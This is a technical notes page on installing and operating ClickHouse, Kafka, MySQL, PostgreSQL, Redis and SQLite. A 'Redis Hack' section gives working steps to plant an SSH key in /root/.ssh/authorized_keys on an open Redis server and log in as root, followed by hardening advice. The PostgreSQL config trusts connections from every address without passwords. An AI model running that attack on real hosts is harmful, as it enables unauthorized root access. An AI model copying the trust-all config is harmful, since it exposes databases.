Data
- 1: ClickHouse
- 1.1: Install ClickHouse
- 2: MQ
- 2.1: Kafka
- 3: MySQL
- 3.1: Install MySQL
- 4: PostgreSQL
- 5: Redis
- 5.1: Redis Cli
- 5.2: Redis Deploy
- 5.3: Redis Hack
- 5.4: Redis Persistence
- 5.5: Redis Sentinel
- 5.6: Redis Type
- 6: Sqlite
1 - ClickHouse
1.1 - Install ClickHouse
docker
docker run -d --name clickhouse \
--ulimit nofile=262144:262144 \
-p 8123:8123 -p 9000:9000 \
-e CLICKHOUSE_DB=test \
-e CLICKHOUSE_USER=root -e CLICKHOUSE_PASSWORD=root \
-e CLICKHOUSE_DEFAULT_ACCESS_MANAGEMENT=1 \
clickhouse/clickhouse-server
echo 'SELECT version()' | curl 'http://localhost:8123/' --user root:root --data-binary @-
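A quick sanity check against the container above (a sketch assuming the root/root account and the test database created by the environment variables):
# create a table, insert a row and read it back over the HTTP interface
echo 'CREATE TABLE test.events (id UInt32, msg String) ENGINE = MergeTree ORDER BY id' \
  | curl 'http://localhost:8123/' --user root:root --data-binary @-
echo "INSERT INTO test.events VALUES (1, 'hello')" \
  | curl 'http://localhost:8123/' --user root:root --data-binary @-
echo 'SELECT * FROM test.events' \
  | curl 'http://localhost:8123/' --user root:root --data-binary @-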
2 - MQ
2.1 - Kafka
install
# https://github.com/provectus/kafka-ui
docker run -p 8080:8080 \
-e KAFKA_CLUSTERS_0_NAME=local \
-e KAFKA_CLUSTERS_0_BOOTSTRAPSERVERS=kafka:9092 \
-d provectuslabs/kafka-ui
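The UI expects a broker at kafka:9092; with any reachable broker, the stock Kafka CLI scripts give a quick smoke test (a sketch assuming the broker answers on localhost:9092 and the scripts are on PATH; older releases use --broker-list instead of --bootstrap-server for the producer):
# create a topic, produce one message, then consume it
kafka-topics.sh --bootstrap-server localhost:9092 --create --topic demo --partitions 1 --replication-factor 1
echo 'hello kafka' | kafka-console-producer.sh --bootstrap-server localhost:9092 --topic demo
kafka-console-consumer.sh --bootstrap-server localhost:9092 --topic demo --from-beginning --max-messages 1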
3 - MySQL
3.1 - Install MySQL
Container
docker run -d -it --name mysql57 \
-e MYSQL_ROOT_PASSWORD=root \
-p 3306:3306 \
mysql:5.7
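Connect and create a scratch database (uses the root/root credentials set above):
docker exec -it mysql57 mysql -uroot -proot
-- inside the mysql client
create database test;
show databases;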
4 - PostgreSQL
install
container
# -e POSTGRES_USER=postgres \
# -e POSTGRES_DB=postgres \
docker run -d -it --name postgres15 \
-e POSTGRES_PASSWORD=postgres \
-v ${PWD}/postgresql.conf:/var/lib/postgresql/data/postgresql.conf \
-v ${PWD}/pg_hba.conf:/var/lib/postgresql/data/pg_hba.conf \
-v ${PWD}/data:/var/lib/postgresql/data \
-p 5432:5432 \
postgres:15
docker exec -it postgres15 psql -hlocalhost -U postgres
GRANT ALL PRIVILEGES ON DATABASE postgres to postgres;
ALTER SCHEMA public OWNER to postgres;
GRANT ALL PRIVILEGES ON ALL SEQUENCES IN SCHEMA public TO postgres;
GRANT ALL PRIVILEGES ON ALL TABLES IN SCHEMA public TO postgres;
select name, setting from pg_settings where category = 'File Locations' ;
/var/lib/postgresql/data/pg_hba.conf
local all all trust
host all all 127.0.0.1/32 trust
host all all ::1/128 trust
local replication all trust
host replication all 127.0.0.1/32 trust
host replication all ::1/128 trust
host all all 0.0.0.0/0 trust
/var/lib/postgresql/data/postgresql.conf
listen_addresses = '*'
#port = 5432 # (change requires restart)
max_connections = 100
shared_buffers = 128MB
dynamic_shared_memory_type = posix
max_wal_size = 1GB
min_wal_size = 80MB
log_timezone = 'Etc/UTC'
datestyle = 'iso, mdy'
timezone = 'Etc/UTC'
lc_messages = 'en_US.utf8'
lc_monetary = 'en_US.utf8'
lc_numeric = 'en_US.utf8'
lc_time = 'en_US.utf8'
default_text_search_config = 'pg_catalog.english'
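After editing pg_hba.conf or postgresql.conf, most settings can be reloaded from psql without restarting the container (listen_addresses and port changes still require a restart):
-- reload the configuration files
select pg_reload_conf();
-- confirm the values currently in effect
show listen_addresses;
show max_connections;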
5 - Redis
5.1 - Redis Cli
Transactions
multi
Start a transaction.
exec
Commit the transaction and execute all queued commands.
discard
Abort the transaction and clear the command queue.
watch key1 [key2...]
Watch keys; if any watched key is changed before exec, the transaction is aborted.
unwatch
Stop watching all keys; a client disconnect also cancels the watches.
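A minimal redis-cli transaction tying the commands above together (the key name is just an example):
watch balance
multi
set balance 100
incrby balance -30
exec
# if another client changed balance after WATCH, EXEC returns (nil) and nothing is applied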
Publish & Subscribe
subscribe channel1 [channel2...]
Subscribe to channels; psubscribe is the glob-pattern version.
unsubscribe channel1 [channel2...]
Unsubscribe from channels; punsubscribe is the glob-pattern version.
publish channel message
Publish a message to a channel.
pubsub
Introspection (e.g. pubsub channels, pubsub numsub).
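Example with two redis-cli sessions (the channel name is just an example):
# client A
subscribe news
# client B
publish news "hello"
pubsub channels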
Type operations
keys *
string
set k v
# string
type k
get k
# return old value
getset k v
mset k1 v1 k2 v2
mget k1 k2
# set only if none of the keys exist
msetnx k1 v1 k2 v2
# append to the tail
append k v
# string length
strlen k
# increment a number string, k++
incr k
decr k
# k += d
incrby k d
decrby k d
# overwrite part of the string, starting at offset
setrange k offset v
# substring, both ends inclusive
getrange k start end
# set or clear the bit at the given offset
setbit k offset v
# set only if the key does not exist
setnx k v
# set with an expiry in seconds, only if the key does not exist
set k v ex seconds nx
list
# push one or more values onto the head of the list
lpush k v1 v2
# push only if the list already exists
lpushx k v
# return the elements in the given range; offsets count from 0, -1 means the last element
lrange key start end
# pop and return the head element
lpop k
llen k
# remove count occurrences of value, scanning from the head
lrem k count v
lset k index v
# return the element at index
lindex k index
# trim the list so that only the given range remains
ltrim k start end
# insert value before (or after) the pivot value p
linsert k before p v
# push one or more values onto the tail of the list
rpush k v1 v2
rpushx k v
rpop k
# atomically pop the tail element of src and push it onto the head of dest
rpoplpush src dest
hash
hset k f v
# set field to value only if the field does not yet exist
hsetnx k f v
hexists k f
hlen k
# delete one or more fields; missing fields are ignored
hdel k f1 f2
# hash[k][f] += increment
hincrby k f increment
hgetall k
# return all fields of the hash
hkeys k
# return the values of all fields of the hash
hvals k
# set several field-value pairs at once
hmset k f1 v1 f2 v2
set
# members that already exist in the set are ignored
sadd k m1 m2
smembers k
# number of members in the set
scard k
# check whether member belongs to the set
sismember k m
# remove and return a random member
spop k
# return a random member without removing it
srandmember k
# remove one or more members; missing members are ignored
srem k m1 m2
# atomically move member from the source set to the destination set
smove src dest m
sdiff set1 set2
sdiffstore diffSet set1 set2
sunion set1 set2
sinterstore interSet set1 set2
zset
zadd k score1 m1 score2 m2
zcard k
zincrby k increment m
# count the members whose score is between min and max
# (inclusive by default)
zcount k min max
# return the members in the given rank range,
# ordered by ascending score
zrange k start end withscores
# same, but ordered by descending score
zrevrange k start end withscores
# return all members whose score is between min and max
# (inclusive), with optional pagination
zrangebyscore k min max withscores limit offset count
# return the rank of member, with members ordered
# by ascending score
zrank k m
zrevrank k m
# return the score of member
zscore k m
zrem k m1 m2
# remove all members within the given rank range
zremrangebyrank k start end
zremrangebyscore k min max
info
info memory
used_memory / used_memory_human: memory allocated by Redis, including memory that the OS has swapped out
used_memory_rss: resident set size, the same figure reported by top or ps, excluding swapped-out memory
mem_fragmentation_ratio: used_memory_rss / used_memory; a healthy value is around 1.03 with jemalloc
mem_allocator: libc, jemalloc or tcmalloc
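As a quick sketch, the fields above can be pulled from a running instance with:
redis-cli info memory | grep -E 'used_memory_human|used_memory_rss|mem_fragmentation_ratio|mem_allocator'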
5.2 - Redis Deploy
container
docker run -it -d --name redis -p 6379:6379 redis
sentinel
localhost
# for a local test setup, disable protected mode first
config set protected-mode no
multi master (3 masters, 3 slaves, and 3 sentinels)
cat << EOF > redis.conf
port 7000
daemonize yes
cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
$redis_server 7000/redis.conf
$redis_server 7001/redis.conf
$redis_server 7002/redis.conf
$redis_server 7003/redis.conf
$redis_server 7004/redis.conf
$redis_server 7005/redis.conf
# three master & three slave
../redis/src/redis-trib.rb create --replicas 1 127.0.0.1:7000 127.0.0.1:7001 \
127.0.0.1:7002 127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005
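redis-trib.rb only ships with older Redis releases; since Redis 5 the same cluster can be created with redis-cli (an equivalent sketch):
redis-cli --cluster create 127.0.0.1:7000 127.0.0.1:7001 127.0.0.1:7002 \
  127.0.0.1:7003 127.0.0.1:7004 127.0.0.1:7005 --cluster-replicas 1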
cat << EOF > sentinel.conf
port 26379
daemonize yes
sentinel monitor mymaster1 127.0.0.1 %port1 2
sentinel down-after-milliseconds mymaster1 60000
sentinel failover-timeout mymaster1 180000
sentinel parallel-syncs mymaster1 1
sentinel monitor mymaster2 127.0.0.1 %port2 2
sentinel down-after-milliseconds mymaster2 60000
sentinel failover-timeout mymaster2 180000
sentinel parallel-syncs mymaster2 1
sentinel monitor mymaster3 127.0.0.1 %port3 2
sentinel down-after-milliseconds mymaster3 60000
sentinel failover-timeout mymaster3 180000
sentinel parallel-syncs mymaster3 1
EOF
# fill in the master ports (assuming the first three nodes, 7000-7002, became the masters)
cat sentinel.conf | sed s/26379/26379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g | sed 's/%port1/7000/g; s/%port2/7001/g; s/%port3/7002/g' > sentinel_2.conf
export redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
single master (1 master, 5 slaves, and 3 sentinels)
cat << EOF > redis.conf
port 7000
daemonize yes
protected-mode no
# cluster-enabled yes
cluster-config-file 7000/nodes.conf
cluster-node-timeout 5000
appendonly yes
EOF
mkdir 7000 7001 7002 7003 7004 7005
cat redis.conf | sed s/7000/7000/g > 7000/redis.conf
cat redis.conf | sed s/7000/7001/g > 7001/redis.conf
cat redis.conf | sed s/7000/7002/g > 7002/redis.conf
cat redis.conf | sed s/7000/7003/g > 7003/redis.conf
cat redis.conf | sed s/7000/7004/g > 7004/redis.conf
cat redis.conf | sed s/7000/7005/g > 7005/redis.conf
export redis_server='../redis/src/redis-server'
# master
$redis_server 7000/redis.conf
# slave
$redis_server 7001/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7002/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7003/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7004/redis.conf --slaveof 127.0.0.1 7000
$redis_server 7005/redis.conf --slaveof 127.0.0.1 7000
cat << EOF > sentinel.conf
port 26379
daemonize yes
protected-mode no
sentinel monitor mymaster 127.0.0.1 7000 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
EOF
cat sentinel.conf | sed s/26379/26379/g > sentinel_0.conf
cat sentinel.conf | sed s/26379/36379/g > sentinel_1.conf
cat sentinel.conf | sed s/26379/46379/g > sentinel_2.conf
redis_server='../redis/src/redis-server'
$redis_server sentinel_0.conf --sentinel
$redis_server sentinel_1.conf --sentinel
$redis_server sentinel_2.conf --sentinel
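To verify the topology once everything is running (ports as configured above):
# replication view from the master
redis-cli -p 7000 info replication
# what the first sentinel sees
redis-cli -p 26379 sentinel master mymaster
redis-cli -p 26379 sentinel slaves mymaster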
5.3 - Redis Hack
Remote login
How to replay
ssh-keygen -t rsa
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo
cat foo | redis-cli -h $remote_ip -x set crack
redis-cli -h $remote_ip
# in redis CLI
config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
# save writes the dump to /root/.ssh/authorized_keys
save
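If the target redis runs as root and sshd accepts key authentication, the planted key then gives a login:
ssh -i id_rsa root@$remote_ip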
How to avoid
# redis.conf
# prevent attackers from changing dir/dbfilename over a remote connection
rename-command FLUSHALL ""
rename-command CONFIG ""
rename-command EVAL ""
requirepass mypassword
bind 127.0.0.1
# run redis as an unprivileged user
groupadd -r redis && useradd -r -g redis redis
5.4 - Redis Persistence
persistence
RDB
fork a child process periodically and dump the whole dataset to a single file
AOF, append-only file
log every write and delete operation
# after 300s, dump if at least 10 key changed
save 300 10
# aof fsync policy: always, everysec or no
appendfsync everysec
# rewrite when the AOF has grown by 100% since the last rewrite
auto-aof-rewrite-percentage 100
auto-aof-rewrite-min-size 64mb
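Persistence status can be inspected and snapshots triggered from redis-cli:
# current RDB/AOF state
redis-cli info persistence
# trigger a background RDB dump / AOF rewrite
redis-cli bgsave
redis-cli bgrewriteaof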
5.5 - Redis Sentinel
sentinel
ping
info replication
info server
info sentinel
sentinel auth-pass <name> <password>
sentinel masters
sentinel master <name>
sentinel slaves <name>
# return the ip and port of the given master;
# if a failover is in progress or has completed, the ip and port of the promoted slave are returned
sentinel get-master-addr-by-name <name>
# reset the state of every master whose name matches the pattern
sentinel reset <pattern>
# force a failover without asking the other sentinels for agreement
sentinel failover <master name>
# start monitoring a new master
sentinel monitor <name> <ip> <port> <quorum>
# stop monitoring the given master
sentinel remove <name>
# change the configuration of the given master; multiple <option> <value> pairs are accepted
sentinel set <name> <option> <value>
conf
# sentinel listens on port 26379 by default
redis-sentinel /path/to/sentinel.conf
redis-server /path/to/sentinel.conf --sentinel
sentinel.conf
sentinel monitor mymaster 127.0.0.1 6379 2
sentinel down-after-milliseconds mymaster 60000
sentinel failover-timeout mymaster 180000
sentinel parallel-syncs mymaster 1
sentinel monitor resque 192.168.1.3 6380 4
sentinel down-after-milliseconds resque 10000
sentinel failover-timeout resque 180000
sentinel parallel-syncs resque 5
sentinel monitor mymaster 127.0.0.1 6379 2
quorum = 2: the master is treated as truly unavailable only after 2 sentinels in the cluster agree that it is down
sentinel <option_name> <master_name> <option_value>
All of these options can be changed at runtime with the SENTINEL SET command.
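For example, against a running sentinel (the default port 26379 is assumed):
redis-cli -p 26379 sentinel set mymaster down-after-milliseconds 30000
redis-cli -p 26379 sentinel set mymaster parallel-syncs 2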
down-after-milliseconds
Sentinel sends PING heartbeats to the master to check that it is alive; if the master fails to reply with PONG within this window, or replies with an error, the sentinel subjectively (unilaterally) considers the master unavailable.
parallel-syncs
During a failover, this option limits how many slaves may resynchronize with the new master at the same time. The smaller the number, the longer the failover takes to complete; the larger it is, the more slaves become unavailable because of replication. Setting it to 1 guarantees that only one slave at a time is unable to serve commands.
Sentinel has two notions of unavailability: subjectively down (SDOWN) and objectively down (ODOWN). SDOWN is the state a single sentinel detects on its own; ODOWN requires a quorum of sentinels to agree that the master is down, which they establish by exchanging the results of the SENTINEL is-master-down-by-addr command.
min-slaves-to-write 1
min-slaves-max-lag 10
When a redis instance is a master, it refuses client writes if it cannot write to at least min-slaves-to-write slaves. Because replication is asynchronous, "cannot write" means the slaves are either disconnected or have not requested replication data from the master within min-slaves-max-lag seconds.
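Both settings belong to the master's redis.conf and, as a sketch, can also be applied at runtime:
redis-cli config set min-slaves-to-write 1
redis-cli config set min-slaves-max-lag 10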
Subscribing to sentinel events
psubscribe *
psubscribe +sdown
All received messages share the format:
<instance-type> <name> <ip> <port> @ <master-name> <master-ip> <master-port>
+reset-master <instance details> -- the master was reset.
+slave <instance details> -- a new slave was detected and added to the slave list.
+failover-state-reconf-slaves <instance details> -- failover state changed to reconf-slaves.
+failover-detected <instance details> -- a failover was detected (started by another sentinel or by other means).
+slave-reconf-sent <instance details> -- the sentinel sent a SLAVEOF command to reconfigure the slave.
+slave-reconf-inprog <instance details> -- the slave is being reconfigured as a slave of the new master, but synchronization has not started yet.
+slave-reconf-done <instance details> -- the slave has been reconfigured as a slave of the new master and is in sync with it.
-dup-sentinel <instance details> -- duplicate sentinels for the given master were removed (this can happen when a sentinel restarts).
+sentinel <instance details> -- a new sentinel for this master was detected and added.
+sdown <instance details> -- the instance entered SDOWN state.
-sdown <instance details> -- the instance left SDOWN state.
+odown <instance details> -- the instance entered ODOWN state.
-odown <instance details> -- the instance left ODOWN state.
+new-epoch <instance details> -- the current epoch (configuration version) was updated.
+try-failover <instance details> -- failover conditions were met; waiting to be elected by the other sentinels.
+elected-leader <instance details> -- this sentinel was elected to perform the failover.
+failover-state-select-slave <instance details> -- starting to select a slave to promote to master.
no-good-slave <instance details> -- no suitable slave was found to promote.
selected-slave <instance details> -- a suitable slave to promote was found.
failover-state-send-slaveof-noone <instance details> -- switching the selected slave to master (SLAVEOF NO ONE).
failover-end-for-timeout <instance details> -- the failover terminated because it timed out.
failover-end <instance details> -- the failover completed successfully.
switch-master <master name> <oldip> <oldport> <newip> <newport> -- the master address changed; this is usually the message clients care about most.
+tilt -- entered Tilt mode.
-tilt -- exited Tilt mode.
5.6 - Redis Type
redisObject
The core of Redis's type system: every key and value in the database, as well as the arguments Redis itself processes, is represented as this data type.
// server.h
/* The actual Redis Object */
#define OBJ_STRING 0 /* String object. */
#define OBJ_LIST 1 /* List object. */
#define OBJ_SET 2 /* Set object. */
#define OBJ_ZSET 3 /* Sorted set object. */
#define OBJ_HASH 4 /* Hash object. */
/* Objects encoding. Some kind of objects like Strings and Hashes can be
* internally represented in multiple ways. The 'encoding' field of the object
* is set to one of this fields for this object. */
#define OBJ_ENCODING_RAW 0 /* Raw representation */
#define OBJ_ENCODING_INT 1 /* Encoded as integer */
#define OBJ_ENCODING_HT 2 /* Encoded as hash table */
#define OBJ_ENCODING_ZIPMAP 3 /* Encoded as zipmap */
#define OBJ_ENCODING_LINKEDLIST 4 /* No longer used: old list encoding. */
#define OBJ_ENCODING_ZIPLIST 5 /* Encoded as ziplist */
#define OBJ_ENCODING_INTSET 6 /* Encoded as intset */
#define OBJ_ENCODING_SKIPLIST 7 /* Encoded as skiplist */
#define OBJ_ENCODING_EMBSTR 8 /* Embedded sds string encoding */
#define OBJ_ENCODING_QUICKLIST 9 /* Encoded as linked list of ziplists */
#define OBJ_ENCODING_STREAM 10 /* Encoded as a radix tree of listpacks */
typedef struct redisObject {
// data type, e.g. OBJ_STRING
unsigned type:4;
// encoding, e.g. OBJ_ENCODING_RAW
unsigned encoding:4;
// #define LRU_BITS 24
// LRU time
unsigned lru:LRU_BITS; /* LRU time (relative to global lru_clock) or
* LFU data (least significant 8 bits frequency
* and most significant 16 bits access time). */
// reference count
int refcount;
// pointer to the underlying value
void *ptr;
} robj;
Type introspection
type keyname
# the value's type: REDIS_STRING, REDIS_LIST, REDIS_HASH, REDIS_SET or REDIS_ZSET
object encoding keyname
# the encoding, e.g. int, embstr or raw for REDIS_STRING
object idletime keyname
# seconds since the key was last accessed (LRU time)
object refcount keyname
# reference count; shared objects exist only for number-format strings
String
Simple Dynamic String
struct sdshdr {
int len;
int free;
char buf[];
};
REDIS_STRING encodings
int: the value is an integer that fits in a long (8 bytes)
embstr: read-only string of at most 39 bytes
raw: string longer than 39 bytes
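The switch between encodings can be observed with the introspection commands above (a short redis-cli sketch; newer Redis versions raise the embstr limit from 39 to 44 bytes):
set n 12345
# -> int
object encoding n
set s "hello"
# -> embstr (short string)
object encoding s
append s " appending converts the object to a plain raw sds string"
# -> raw
object encoding s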
6 - Sqlite
cmd
.help
.databases
.tables
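A few more sqlite3 dot-commands that are handy with the sample below:
.headers on
.mode column
.schema student
.quit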
Sample
-- jdbc:mysql://localhost:3306?useSSL=false&serverTimezone=UTC&allowPublicKeyRetrieval=true
-- jdbc:sqlite:test.sqlite
create database test;
create table student (
name varchar(100) not null primary key,
class varchar(100),
gender varchar(100),
age smallint default -1,
height decimal(16,6),
weight decimal(16,6)
);
insert into student values
('john','a','male',27,173,78),
('paul','a','male',27,179,73),
('george','b','male',25,182,69),
('ringer','c','male',24,169,59),
('yoko','a','female',33,165,53),
('rita','b','female',25,163,57),
('lucy','c','female',28,175,60);
-- columns: date, subject, student_name, score
create table score (
`date` date not null,
subject varchar(100),
student_name varchar(100),
score decimal(16,6)
);
insert into score values
('2020-08-04','chinese','john',60),
('2020-08-04','chinese','paul',75),
('2020-08-04','chinese','george',55),
('2020-08-04','chinese','ringer',81),
('2020-08-04','chinese','yoko',95),
('2020-08-04','chinese','rita',72),
('2020-08-04','chinese','lucy',88),
('2020-08-04','math','john',96),
('2020-08-04','math','paul',100),
('2020-08-04','math','george',65),
('2020-08-04','math','ringer',87),
('2020-08-04','math','yoko',77),
('2020-08-04','math','rita',85),
('2020-08-04','math','lucy',98),
('2020-08-04','pe','john',82),
('2020-08-04','pe','paul',97),
('2020-08-04','pe','george',71),
('2020-08-04','pe','ringer',100),
('2020-08-04','pe','yoko',85),
('2020-08-04','pe','rita',52),
('2020-08-04','pe','lucy',75),
('2020-08-05','chinese','john',64),
('2020-08-05','chinese','paul',80),
('2020-08-05','chinese','george',42),
('2020-08-05','chinese','ringer',91),
('2020-08-05','chinese','yoko',100),
('2020-08-05','chinese','rita',79),
('2020-08-05','chinese','lucy',82),
('2020-08-05','math','john',91),
('2020-08-05','math','paul',90),
('2020-08-05','math','george',73),
('2020-08-05','math','ringer',76),
('2020-08-05','math','yoko',87),
('2020-08-05','math','rita',81),
('2020-08-05','math','lucy',100),
('2020-08-05','pe','john',88),
('2020-08-05','pe','paul',100),
('2020-08-05','pe','george',67),
('2020-08-05','pe','ringer',91),
('2020-08-05','pe','yoko',92),
('2020-08-05','pe','rita',60),
('2020-08-05','pe','lucy',73);
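A couple of example queries over the sample data (plain SQL that should run on both MySQL and SQLite):
-- average score per subject and date
select `date`, subject, avg(score) as avg_score
from score
group by `date`, subject;
-- math scores on 2020-08-04, joined with each student's class
select st.class, st.name, sc.score
from student st
join score sc on sc.student_name = st.name
where sc.subject = 'math' and sc.`date` = '2020-08-04'
order by sc.score desc;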